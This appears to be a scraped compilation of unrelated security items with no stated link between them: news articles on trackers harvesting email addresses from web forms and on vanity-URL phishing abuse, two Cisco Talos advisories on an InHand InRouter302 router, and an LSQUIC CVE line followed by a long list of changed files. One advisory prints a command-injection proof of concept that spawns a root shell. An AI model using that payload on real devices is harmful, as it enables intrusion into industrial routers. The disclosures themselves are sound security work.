Data harvested without consent and before forms are submitted in many cases, researchers claim

Data harvested without consent and before forms are submitted in many cases, researchers claim

Email addresses typed into online forms are often handed over to web trackers before being submitted and without user consent, a systematic study by computer scientists has discovered.

Email addresses – or identifiers derived from them – are apparently being used by data brokers and advertisers for cross-site and cross-platform identification of computer users.

As part of an investigation into how data from online forms is used for tracking, a team of four computer scientists measured the extent of email and password collection prior to form submission by analyzing the top 100,000 websites.

Catch up on the latest privacy-related security news and analysis

The researchers – Asuman Senol from KU Leuven in the Netherlands, Mathias Humbert (University of Lausanne, Switzerland), and Gunes Acar and Frederik Zuiderveen Borgesius (both from Radboud University, Belgium) – compared results from two vantage points, in the US and EU, as well as between mobile and desktop browsers.

**Tracking domains**

The team found that email addresses were exfiltrated to tracking domains before form submission and without giving consent on 1,844 websites in the EU crawl and 2,950 websites in the US crawl.

In the majority of cases, data was extracted to well-known tracker domains, but the researchers also identified 41 tracker domains omitted from popular blocklists.

Profiling for ad-serving purposes is not the only concern.

The researchers also identified seemingly inadvertent password collection from 52 websites by third-party relay scripts.

A research paper (PDF) based on the study is due to be presented at the upcoming Usenix ’22 security conference.

INSIGHT Research has come a long way, but gaps remain – security researcher Artur Janc on the state of XS-Leaks

Web users typically enter their email addresses into online forms for reasons including signing up to a service or subscribing to a newsletter.

The research shows that any data entered into such forms may end up in the hands of data brokers – sometimes even in cases where individuals have second thoughts about signing up to something and didn’t hit ‘send’.

The researchers used an online crawler to systematically examine what happens when users close their session before submitting data entered on forms.

**GDPR violation concerns**

Although not a lawyer, Gunes Acar, one of the four main researchers on the project, told The Daily Swig that the behavior of some of the websites may be in violation of stricter data privacy regulations such as the European Union’s General Data Protection Regulation (GDPR).

“Surreptitious email exfiltration for tracking purposes may breach some GDPR principles such as transparency, purpose limitation, and legal basis, but we cannot say for certain whether individual websites violate the GDPR (or other laws) without looking at the specifics,” Acar explained.

Almost half of the websites contacted responded to the researchers’ GDPR-related requests (see response sample here).

“Some websites said they didn’t know that their visitors’ emails were collected by third parties, and they fixed the issue,” Acar said. “That was the most positive outcome.

“Other websites informed us how they were using the emails collected through this behavior,” they added.

**Countermeasures**

Privacy-conscious internet users might well recoil from the revelations, as summarized in a blog post featuring screen captures and videos.

Fortunately, some countermeasures are already available.

Acar explained: “Adblockers (e.g. uBlock Origin) and privacy-focused browsers (Brave, DuckDuckGo) block requests to tracker and advertising domains, and hence may prevent this type of data collection. Only blocking the cookies wouldn’t provide any protection.

“Email relay services may be used to avoid giving the same email address to different online and offline businesses. Apple, DuckDuckGo, and Mozilla offer such services, which can be used to generate alias addresses,” Acer concluded.

The researchers have developed a proof-of-concept browser plugin, LeakInspector, which informs users when their email and passwords are scraped from forms, in addition to blocking “leaky” requests to tracker domains.

“Unfortunately, the add-on is not available on Chrome Web Store, because it relies on APIs that Google disallows in Manifest v3,” Acar said. “We are working on publishing the add-on to Firefox’s add-on repository.”

RECOMMENDED Facebook account takeover: Researcher scoops $40k bug bounty for chained exploit

Popular websites leaking user email data to web tracking domains

An OS command injection vulnerability exists in the console infactory_net functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An OS command injection vulnerability exists in the console infactory\_net functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.37

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

Here is the prompt after the login:

    ************************************************
            Welcome to Router console
        Inhand
        Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
        http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.37
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
    help           -- get help for commands
    language       -- Set language
    show           -- show system information
    exit           -- exit current mode/console
    ping           -- ping test
    comredirect    -- COM redirector
    telnet         -- telnet to a host
    traceroute     -- trace route to a host
    enable         -- turn on privileged commands
    infactory      -- factory mode
    Router>
    

The infactory command permits, provided the correct password, the access to the factory mode view. This mode permits to change the configuration and perform various tests. The factory mode view:

    Router> infactory 
    input password: 
    Router(factory)# 
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
    help           -- get help for commands
    language       -- Set language
    exit           -- exit current mode/console
    reboot         -- reboot system
    factory-model  -- hardware model configure
    modem          -- modem test
    reset-key      -- check the status of the reset button
    com            -- detecting serial ports
    port           -- FCT network port test
    net            -- complete machine network port test
    led            -- LED lights test
    wlan           -- Wi-Fi test
    mem            -- check memory
    hw_wdg         -- check the hardware watchdog status
    dio            -- detect digital I/O
    stategridsec   -- detect stategrid security chip
    Router(factory)# 
    

This mode offers several functionalities. For instance, the net functionality allows to essentially execute a ping command specifying its interface parameter.

The net_functionality:

    undefined4 net_functionality(undefined4 param_1,int args)
    
    {
        [...]
        
        argument_list_ptr[0] = args;
        [...]
        if (argument_list_ptr[0] != 0) {
            first_arg = (char *)maybe_get_next_token(argument_list_ptr);
            if (*first_arg != '\0') {
                is_init = strncmp(first_arg,"init",4);
                if (is_init == 0) {
                    [...]
                }
                is_test = strncmp(first_arg,"test",4);
                if ((is_test == 0) &&
                    (interface = (char *)maybe_get_next_token(argument_list_ptr), 
                    interface != (char *)0x0)) {                                                            [1]
                    max_args = 3;
                    packets_count = 0;
                    timeout_ = 0;
                    target_ip = (char *)0x0;
                    [... here are parsed 3 optional parameters ...]
                    snprintf((char *)&ping_command,0x80,"ping -I %s -c %d -W %d %s",interface,packets_count,
                            timeout,target_ip);                                                             [2]
                    popen_stream = popen((char *)&ping_command,"r");                                        [3]
                    [...]
    }
    

If the first provided argument is test, then the second one, parsed at [1], will be later used at [2] to form the string ping -I <second_arg> -c <packets_count> -W <timeout> <target_ip>. This string will later be used at [3] as argument of the popen function.

The second argument is not properly sanitized, and a command injection can occur at [3]. An attacker, able to reach the net functionality, would be able to obtain a root shell.

**Exploit Proof of Concept**

Provided the command net test ;/bin/sh;, in the factory mode view, a root shell will be obtained:

    Router(factory)# net test ;/bin/sh;
    ping: option requires an argument -- I
    BusyBox v1.26.2 (2022-02-23 16:03:56 CST) multi-call binary.
    
    Usage: ping [OPTIONS] HOST
    help
    Built-in commands:
    ------------------
        . : [ [[ break cd chdir continue echo eval exec exit export false
        hash help history let local printf pwd read readonly return set
        shift source test times trap true type ulimit umask unset wait
    

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-30 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-26518: TALOS-2022-1501 || Cisco Talos Intelligence Group

A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.37

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

4.3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

**CWE**

CWE-259 - Use of Hard-coded Password

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers the telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

    ************************************************
               Welcome to Router console
          Inhand
          Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
          http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.37
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      show           -- show system information
      exit           -- exit current mode/console
      ping           -- ping test
      comredirect    -- COM redirector
      telnet         -- telnet to a host
      traceroute     -- trace route to a host
      enable         -- turn on privileged commands
      infactory      -- factory mode
    Router> 
    

A low-privileged user can login into this service. The Router console contains a command, called infactory. This functionality will request a password; if correct, a menu with several functions is accessed.

The infactory_command:

    undefined4 infactory_command(undefined4 param_1,char *provided_password)
    
    {
     [...]
    
      if ((provided_password == (char *)0x0) || (*provided_password == '\0')) {
        provided_password = password_in_stack;
        uVar2 = get_help_string("input_pass");
        get_pass_wrap(uVar2,provided_password,0x40);
      }
      aes_decrypt_str(<REDACTED>,0x40,decrypted_password,0x80);                                             [1]
      password_len = strlen(decrypted_password);
      iVar1 = strncmp(decrypted_password,provided_password,password_len);                                   [2]
      if (iVar1 == 0) {
        change_view(view_cursor,&view_infactory);                                                           [3]
        return 0;
      }
      [...]
    }
    

This function will first, at [1], decrypt a hard-coded hex encoded string. Then, if the comparison between the described string and the provided password, at [2], returns zero, meaning the two string are equal, then the code at [3] will be reached. Then the “view” will be changed, which means that the available commands will change.

The aes_decrypt_str:

    undefined4 aes_decrypt_str(char *data,uint data_len,char *output_buff)
    {
      [...]
      IV._0_4_ = 0;
      IV._4_4_ = 0;
      IV._8_4_ = 0;
      IV._12_4_ = 0;
      if ((data_len & 0x1f) == 0) {
        __size = (int)data_len / 2;
        data_bin = malloc(__size);
        if (data_bin == (void *)0x0) {
          syslog(3,"out of memory!");
          uVar1 = 0xffffffff;
        }
        else {
          str2bin(data,__size,data_bin);
          AES_set_key(AES_key,<REDACTED>,128);                                                              [4]
          uVar1 = IH_AES_cbc_encrypt(AES_key,data_bin,output_buff,__size,IV,0);
          free(data_bin);
        }
      }
      [...]
    }
    

The hard-coded data provided at [1] are decrypted, at [4], using AES with a hard-coded key. An attacker, in possession of low-privileged user credentials, would be able to access the infactory functionalities.

**Exploit Proof of Concept**

Using the infactory command and providing the correct password will list the infactory functionalities:

    Router> infactory
    input password: 
    Router(factory)# 
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      exit           -- exit current mode/console
      reboot         -- reboot system
      factory-model  -- hardware model configure
      modem          -- modem test
      reset-key      -- check the status of the reset button
      com            -- detecting serial ports
      port           -- FCT network port test
      net            -- complete machine network port test
      led            -- LED lights test
      wlan           -- Wi-Fi test
      mem            -- check memory
      hw_wdg         -- check the hardware watchdog status
      dio            -- detect digital I/O
      stategridsec   -- detect stategrid security chip
    Router(factory)# 
    

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-28 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-27172: TALOS-2022-1496 || Cisco Talos Intelligence Group

Attack technique bypasses email filters and burnishes credibility of phishing links

Attack technique bypasses email filters and burnishes credibility of phishing links

A failure to validate subdomains within so-called ‘vanity URLs’ by Box, Zoom, and Google Docs created a powerful way to enhance their phishing campaigns, security researchers have revealed.

Vanity URLs can be customized to include a brand name and a description of the link’s purpose (for example, brandname/registernow) and typically redirect to a longer, generic URL.

Widely used by software-as-a-service (SaaS) applications, vanity URLs are used to share or request files, invite users to register for events, and so on.

**False sense of security**

The vulnerabilities discovered in Box, Zoom, and Google Docs enable attackers to abuse the apparent reassurance vanity URLs offer recipients that they are dealing with a legitimate organization rather than cybercriminals.

Researchers from Varonis Threat Labs found that the SaaS applications validated vanity URLs’ URI (the unique sequence of characters at the end of the link), but not its descriptive subdomain (the portion preceding the URI).

Read more of the latest phishing news and attacks

“As a result, threat actors can use their own SaaS accounts to generate links to malicious content (files, folders, landing pages, forms, etc.) that appears to be hosted by your company’s sanctioned SaaS account,” reads a blog post published by Varonis Threat Labs.

“Achieving this is as easy as changing the subdomain in the link.”

**Hit rate**

This attack technique, as demonstrated in this video, would act to massively boost the success rate of phishing or malware distribution campaigns, according to Varonis CMO Rob Sobers.

“It can make a massive difference because spoofed links appear legitimate to security technologies like email filters and CASBs (Cloud Access Security Broker\],” Sobers told The Daily Swig.

“They would normally block a faked or misspelled URL (like apple-support.zoom.us). In this case, since we’re spoofing the REAL URL, there’s no way for these types of technologies to automatically filter or flag the URL as malicious.”

Sobers continued: “Also, savvy users can typically pick up on subtle differences when loading a fake URL in their browser – things like an invalid security certificate or misspelled subdomain. With this abuse, the URL and certificate are completely valid.”

Since three of the most widely used SaaS apps containing the same flaw, “it’s very likely that similar issues exist in other SaaS apps”, warned Sobers.

**Tell-tale signs**

Box, the popular cloud content management app, patched flaws affecting vanity URLs for file-sharing and public forms used to request files and associated information.

The file-sharing issue was exacerbated by an attacker’s ability to add password protection to malicious files and upload a targeted brand’s logo and recreate its color scheme, while the absence of branding on public forms makes it harder for victims to spot tell-tale design flaws.

A spokesperson from Zoom told The Daily Swig that it had addressed the potential abuse of vanity URLs for meeting recordings and webinar registration pages “by warning users if they are being redirected to a different subdomain”.

However, Varonis urged users to be “cautious when accessing branded Zoom links” given that “users often click through non-critical warning messages”.

Attackers could also brand a Google Form requesting sensitive confidential data with targeted company’s logo as yourcompanydomain.docs.google.com/forms/d/e/:form\_id/viewform.

“The form could require registering with an email from your company domain, making it seem more trustworthy,” said Varonis.

Google Doc documents exchanged via the ‘publish to web’ feature are similarly vulnerable.

Google is yet to roll out a fix, according to Varonis.

YOU MIGHT ALSO LIKE RuTube hack: Russian video platform denies loss of source code following cyber-attack

Box, Zoom, Google Docs offer phishing boost with ‘vanity URL’ flaws

liblsquic/lsquic_qenc_hdl.c in LiteSpeed QUIC (aka LSQUIC) before 3.1.0 mishandles MAX_TABLE_CAPACITY.

Permalink

Showing with **294 additions** and **287 deletions**.

1.  +1 −1 APIs.txt
2.  +11 −0 CHANGELOG
3.  +1 −9 CMakeLists.txt
4.  +1 −1 CONTRIBUTORS.txt
5.  +1 −1 EXAMPLES.txt
6.  +1 −1 LICENSE
7.  +1 −1 bin/CMakeLists.txt
8.  +1 −1 bin/duck\_client.c
9.  +1 −1 bin/duck\_server.c
10.  +1 −1 bin/echo\_client.c
11.  +1 −1 bin/echo\_server.c
12.  +1 −1 bin/http\_client.c
13.  +1 −1 bin/http\_server.c
14.  +1 −1 bin/md5\_client.c
15.  +1 −1 bin/md5\_server.c
16.  +1 −1 bin/perf\_client.c
17.  +1 −1 bin/perf\_server.c
18.  +1 −1 bin/prog.c
19.  +1 −1 bin/prog.h
20.  +1 −1 bin/test\_cert.c
21.  +1 −1 bin/test\_cert.h
22.  +1 −1 bin/test\_common.c
23.  +1 −1 bin/test\_common.h
24.  +3 −3 docs/conf.py
25.  +3 −3 include/lsquic.h
26.  +1 −1 include/lsquic\_types.h
27.  +1 −1 include/lsxpack\_header.h
28.  +1 −1 src/CMakeLists.txt
29.  +2 −1 src/liblsquic/CMakeLists.txt
30.  +1 −1 src/liblsquic/common\_cert\_set\_2.c
31.  +1 −1 src/liblsquic/common\_cert\_set\_2a.inc
32.  +1 −1 src/liblsquic/common\_cert\_set\_2b.inc
33.  +1 −1 src/liblsquic/common\_cert\_set\_3.c
34.  +1 −1 src/liblsquic/common\_cert\_set\_3a.inc
35.  +1 −1 src/liblsquic/common\_cert\_set\_3b.inc
36.  +1 −1 src/liblsquic/fiu-local.h
37.  +1 −1 src/liblsquic/ls-sfparser.c
38.  +1 −1 src/liblsquic/ls-sfparser.h
39.  +1 −1 src/liblsquic/lsquic\_adaptive\_cc.c
40.  +1 −1 src/liblsquic/lsquic\_adaptive\_cc.h
41.  +1 −1 src/liblsquic/lsquic\_alarmset.c
42.  +1 −1 src/liblsquic/lsquic\_alarmset.h
43.  +1 −1 src/liblsquic/lsquic\_arr.c
44.  +1 −1 src/liblsquic/lsquic\_arr.h
45.  +1 −1 src/liblsquic/lsquic\_attq.c
46.  +1 −1 src/liblsquic/lsquic\_attq.h
47.  +1 −1 src/liblsquic/lsquic\_bbr.c
48.  +1 −1 src/liblsquic/lsquic\_bbr.h
49.  +1 −1 src/liblsquic/lsquic\_bw\_sampler.c
50.  +1 −1 src/liblsquic/lsquic\_bw\_sampler.h
51.  +1 −1 src/liblsquic/lsquic\_byteswap.h
52.  +1 −1 src/liblsquic/lsquic\_cfcw.c
53.  +1 −1 src/liblsquic/lsquic\_chsk\_stream.c
54.  +1 −1 src/liblsquic/lsquic\_chsk\_stream.h
55.  +1 −1 src/liblsquic/lsquic\_cong\_ctl.h
56.  +1 −1 src/liblsquic/lsquic\_conn.c
57.  +1 −1 src/liblsquic/lsquic\_conn.h
58.  +1 −1 src/liblsquic/lsquic\_conn\_flow.h
59.  +1 −1 src/liblsquic/lsquic\_conn\_public.h
60.  +1 −1 src/liblsquic/lsquic\_crand.c
61.  +1 −1 src/liblsquic/lsquic\_crand.h
62.  +1 −1 src/liblsquic/lsquic\_crt\_compress.c
63.  +1 −1 src/liblsquic/lsquic\_crt\_compress.h
64.  +1 −1 src/liblsquic/lsquic\_crypto.c
65.  +1 −1 src/liblsquic/lsquic\_crypto.h
66.  +1 −1 src/liblsquic/lsquic\_cubic.c
67.  +1 −1 src/liblsquic/lsquic\_cubic.h
68.  +1 −1 src/liblsquic/lsquic\_data\_in\_if.h
69.  +1 −1 src/liblsquic/lsquic\_di\_error.c
70.  +1 −1 src/liblsquic/lsquic\_di\_hash.c
71.  +1 −1 src/liblsquic/lsquic\_di\_nocopy.c
72.  +1 −1 src/liblsquic/lsquic\_enc\_sess.h
73.  +1 −1 src/liblsquic/lsquic\_enc\_sess\_common.c
74.  +1 −1 src/liblsquic/lsquic\_enc\_sess\_ietf.c
75.  +1 −1 src/liblsquic/lsquic\_eng\_hist.c
76.  +1 −1 src/liblsquic/lsquic\_eng\_hist.h
77.  +1 −1 src/liblsquic/lsquic\_engine.c
78.  +1 −1 src/liblsquic/lsquic\_engine\_public.h
79.  +1 −1 src/liblsquic/lsquic\_ev\_log.c
80.  +1 −1 src/liblsquic/lsquic\_ev\_log.h
81.  +1 −1 src/liblsquic/lsquic\_frab\_list.c
82.  +1 −1 src/liblsquic/lsquic\_frab\_list.h
83.  +1 −1 src/liblsquic/lsquic\_frame\_common.c
84.  +1 −1 src/liblsquic/lsquic\_frame\_common.h
85.  +1 −1 src/liblsquic/lsquic\_frame\_reader.c
86.  +1 −1 src/liblsquic/lsquic\_frame\_reader.h
87.  +1 −1 src/liblsquic/lsquic\_frame\_writer.c
88.  +1 −1 src/liblsquic/lsquic\_frame\_writer.h
89.  +1 −1 src/liblsquic/lsquic\_full\_conn.c
90.  +1 −1 src/liblsquic/lsquic\_full\_conn.h
91.  +1 −1 src/liblsquic/lsquic\_full\_conn\_ietf.c
92.  +1 −1 src/liblsquic/lsquic\_global.c
93.  +1 −1 src/liblsquic/lsquic\_handshake.c
94.  +1 −1 src/liblsquic/lsquic\_handshake.h
95.  +1 −1 src/liblsquic/lsquic\_hash.c
96.  +1 −1 src/liblsquic/lsquic\_hash.h
97.  +1 −1 src/liblsquic/lsquic\_hcsi\_reader.c
98.  +1 −1 src/liblsquic/lsquic\_hcsi\_reader.h
99.  +1 −1 src/liblsquic/lsquic\_hcso\_writer.c
100.  +1 −1 src/liblsquic/lsquic\_hcso\_writer.h
101.  +1 −1 src/liblsquic/lsquic\_headers.h
102.  +1 −1 src/liblsquic/lsquic\_headers\_stream.c
103.  +1 −1 src/liblsquic/lsquic\_headers\_stream.h
104.  +1 −1 src/liblsquic/lsquic\_hkdf.c
105.  +1 −1 src/liblsquic/lsquic\_hkdf.h
106.  +1 −1 src/liblsquic/lsquic\_hpi.c
107.  +1 −1 src/liblsquic/lsquic\_hpi.h
108.  +1 −1 src/liblsquic/lsquic\_hq.h
109.  +1 −1 src/liblsquic/lsquic\_hspack\_valid.c
110.  +1 −1 src/liblsquic/lsquic\_http.c
111.  +1 −1 src/liblsquic/lsquic\_http1x\_if.c
112.  +1 −1 src/liblsquic/lsquic\_http1x\_if.h
113.  +1 −1 src/liblsquic/lsquic\_ietf.h
114.  +1 −1 src/liblsquic/lsquic\_int\_types.h
115.  +1 −1 src/liblsquic/lsquic\_logger.c
116.  +1 −1 src/liblsquic/lsquic\_logger.h
117.  +1 −1 src/liblsquic/lsquic\_malo.c
118.  +1 −1 src/liblsquic/lsquic\_malo.h
119.  +1 −1 src/liblsquic/lsquic\_min\_heap.c
120.  +1 −1 src/liblsquic/lsquic\_min\_heap.h
121.  +1 −1 src/liblsquic/lsquic\_mini\_conn.c
122.  +1 −1 src/liblsquic/lsquic\_mini\_conn.h
123.  +1 −1 src/liblsquic/lsquic\_mini\_conn\_ietf.c
124.  +1 −1 src/liblsquic/lsquic\_mini\_conn\_ietf.h
125.  +1 −1 src/liblsquic/lsquic\_minmax.c
126.  +1 −1 src/liblsquic/lsquic\_minmax.h
127.  +1 −1 src/liblsquic/lsquic\_mm.c
128.  +1 −1 src/liblsquic/lsquic\_mm.h
129.  +1 −1 src/liblsquic/lsquic\_pacer.c
130.  +1 −1 src/liblsquic/lsquic\_pacer.h
131.  +1 −1 src/liblsquic/lsquic\_packet\_common.c
132.  +1 −1 src/liblsquic/lsquic\_packet\_common.h
133.  +1 −1 src/liblsquic/lsquic\_packet\_gquic.c
134.  +1 −1 src/liblsquic/lsquic\_packet\_gquic.h
135.  +1 −1 src/liblsquic/lsquic\_packet\_ietf.h
136.  +1 −1 src/liblsquic/lsquic\_packet\_in.c
137.  +1 −1 src/liblsquic/lsquic\_packet\_in.h
138.  +1 −1 src/liblsquic/lsquic\_packet\_out.c
139.  +1 −1 src/liblsquic/lsquic\_packet\_out.h
140.  +1 −1 src/liblsquic/lsquic\_packet\_resize.c
141.  +1 −1 src/liblsquic/lsquic\_packet\_resize.h
142.  +1 −1 src/liblsquic/lsquic\_parse.h
143.  +1 −1 src/liblsquic/lsquic\_parse\_Q046.c
144.  +1 −1 src/liblsquic/lsquic\_parse\_Q050.c
145.  +1 −1 src/liblsquic/lsquic\_parse\_common.c
146.  +1 −1 src/liblsquic/lsquic\_parse\_common.h
147.  +1 −1 src/liblsquic/lsquic\_parse\_gquic\_be.c
148.  +1 −1 src/liblsquic/lsquic\_parse\_gquic\_be.h
149.  +1 −1 src/liblsquic/lsquic\_parse\_gquic\_common.c
150.  +1 −1 src/liblsquic/lsquic\_parse\_ietf.h
151.  +1 −1 src/liblsquic/lsquic\_parse\_ietf\_v1.c
152.  +1 −1 src/liblsquic/lsquic\_parse\_iquic\_common.c
153.  +1 −1 src/liblsquic/lsquic\_pr\_queue.c
154.  +1 −1 src/liblsquic/lsquic\_pr\_queue.h
155.  +1 −1 src/liblsquic/lsquic\_purga.c
156.  +1 −1 src/liblsquic/lsquic\_purga.h
157.  +1 −1 src/liblsquic/lsquic\_push\_promise.h
158.  +1 −1 src/liblsquic/lsquic\_qdec\_hdl.c
159.  +1 −1 src/liblsquic/lsquic\_qdec\_hdl.h
160.  +4 −1 src/liblsquic/lsquic\_qenc\_hdl.c
161.  +1 −1 src/liblsquic/lsquic\_qenc\_hdl.h
162.  +1 −1 src/liblsquic/lsquic\_qlog.c
163.  +1 −1 src/liblsquic/lsquic\_qlog.h
164.  +1 −1 src/liblsquic/lsquic\_qpack\_dec\_logger.h
165.  +1 −1 src/liblsquic/lsquic\_qpack\_enc\_logger.h
166.  +1 −1 src/liblsquic/lsquic\_qpack\_exp.c
167.  +1 −1 src/liblsquic/lsquic\_qpack\_exp.h
168.  +1 −1 src/liblsquic/lsquic\_qtags.h
169.  +1 −1 src/liblsquic/lsquic\_rechist.c
170.  +1 −1 src/liblsquic/lsquic\_rechist.h
171.  +1 −1 src/liblsquic/lsquic\_rtt.c
172.  +1 −1 src/liblsquic/lsquic\_rtt.h
173.  +1 −1 src/liblsquic/lsquic\_send\_ctl.c
174.  +1 −1 src/liblsquic/lsquic\_send\_ctl.h
175.  +1 −1 src/liblsquic/lsquic\_senhist.c
176.  +1 −1 src/liblsquic/lsquic\_senhist.h
177.  +1 −1 src/liblsquic/lsquic\_set.c
178.  +1 −1 src/liblsquic/lsquic\_set.h
179.  +1 −1 src/liblsquic/lsquic\_sfcw.c
180.  +1 −1 src/liblsquic/lsquic\_sfcw.h
181.  +1 −1 src/liblsquic/lsquic\_shsk\_stream.c
182.  +1 −1 src/liblsquic/lsquic\_shsk\_stream.h
183.  +1 −1 src/liblsquic/lsquic\_sizes.h
184.  +1 −1 src/liblsquic/lsquic\_spi.c
185.  +1 −1 src/liblsquic/lsquic\_spi.h
186.  +1 −1 src/liblsquic/lsquic\_stock\_shi.c
187.  +1 −1 src/liblsquic/lsquic\_stock\_shi.h
188.  +1 −1 src/liblsquic/lsquic\_str.c
189.  +1 −1 src/liblsquic/lsquic\_str.h
190.  +1 −1 src/liblsquic/lsquic\_stream.c
191.  +1 −1 src/liblsquic/lsquic\_stream.h
192.  +1 −1 src/liblsquic/lsquic\_tokgen.c
193.  +1 −1 src/liblsquic/lsquic\_tokgen.h
194.  +1 −1 src/liblsquic/lsquic\_trans\_params.c
195.  +1 −1 src/liblsquic/lsquic\_trans\_params.h
196.  +1 −1 src/liblsquic/lsquic\_trechist.c
197.  +1 −1 src/liblsquic/lsquic\_trechist.h
198.  +1 −1 src/liblsquic/lsquic\_util.c
199.  +1 −1 src/liblsquic/lsquic\_util.h
200.  +1 −1 src/liblsquic/lsquic\_varint.c
201.  +1 −1 src/liblsquic/lsquic\_varint.h
202.  +1 −1 src/liblsquic/lsquic\_ver\_neg.h
203.  +1 −1 src/liblsquic/lsquic\_version.c
204.  +1 −1 src/liblsquic/lsquic\_version.h
205.  +1 −1 src/liblsquic/lsquic\_xxhash.c
206.  +1 −1 src/liblsquic/lsquic\_xxhash.h
207.  +1 −1 tests/CMakeLists.txt
208.  +1 −1 tests/graph\_cubic.c
209.  +1 −1 tests/mini\_parse.c
210.  +1 −1 tests/test\_ack.c
211.  +1 −1 tests/test\_ack\_merge.c
212.  +1 −1 tests/test\_ackgen\_gquic\_be.c
213.  +1 −1 tests/test\_ackparse\_gquic\_be.c
214.  +1 −1 tests/test\_ackparse\_ietf.c
215.  +1 −1 tests/test\_alarmset.c
216.  +1 −1 tests/test\_alt\_svc\_ver.c
217.  +1 −1 tests/test\_arr.c
218.  +1 −1 tests/test\_attq.c
219.  +1 −1 tests/test\_blocked\_gquic\_be.c
220.  +1 −1 tests/test\_bw\_sampler.c
221.  +1 −1 tests/test\_chlo\_gen.c
222.  +1 −1 tests/test\_clear\_aead.c
223.  +1 −1 tests/test\_conn\_close\_gquic\_be.c
224.  +1 −1 tests/test\_conn\_hash.c
225.  +1 −1 tests/test\_crypto\_gen.c
226.  +1 −1 tests/test\_cubic.c
227.  +1 −1 tests/test\_dec.c
228.  +1 −1 tests/test\_di\_nocopy.c
229.  +1 −1 tests/test\_elision.c
230.  +1 −1 tests/test\_engine\_ctor.c
231.  +1 −1 tests/test\_export\_key.c
232.  +1 −1 tests/test\_frame\_chop.c
233.  +1 −1 tests/test\_frame\_reader.c
234.  +1 −1 tests/test\_frame\_rw.c
235.  +1 −1 tests/test\_frame\_writer.c
236.  +1 −1 tests/test\_goaway\_gquic\_be.c
237.  +1 −1 tests/test\_h3\_framing.c
238.  +1 −1 tests/test\_hcsi\_reader.c
239.  +1 −1 tests/test\_hkdf.c
240.  +1 −1 tests/test\_hpi.c
241.  +1 −1 tests/test\_lsquic\_hash.c
242.  +1 −1 tests/test\_malo.c
243.  +1 −1 tests/test\_min\_heap.c
244.  +1 −1 tests/test\_minmax.c
245.  +1 −1 tests/test\_packet\_out.c
246.  +1 −1 tests/test\_packet\_resize.c
247.  +1 −1 tests/test\_packno\_len.c
248.  +1 −1 tests/test\_parse\_packet\_in.c
249.  +1 −1 tests/test\_purga.c
250.  +1 −1 tests/test\_qlog.c
251.  +1 −1 tests/test\_quic\_be\_floats.c
252.  +1 −1 tests/test\_rechist.c
253.  +1 −1 tests/test\_reg\_pkt\_headergen.c
254.  +1 −1 tests/test\_rst\_stream\_gquic\_be.c
255.  +1 −1 tests/test\_rst\_stream\_ietf.c
256.  +1 −1 tests/test\_rtt.c
257.  +1 −1 tests/test\_send\_headers.c
258.  +1 −1 tests/test\_senhist.c
259.  +1 −1 tests/test\_set.c
260.  +1 −1 tests/test\_sfcw.c
261.  +1 −1 tests/test\_shi.c
262.  +1 −1 tests/test\_some\_packets.c
263.  +1 −1 tests/test\_spi.c
264.  +1 −1 tests/test\_stop\_waiting\_gquic\_be.c
265.  +1 −1 tests/test\_stream.c
266.  +1 −1 tests/test\_streamgen.c
267.  +1 −1 tests/test\_streamparse.c
268.  +1 −1 tests/test\_tokgen.c
269.  +1 −1 tests/test\_trapa.c
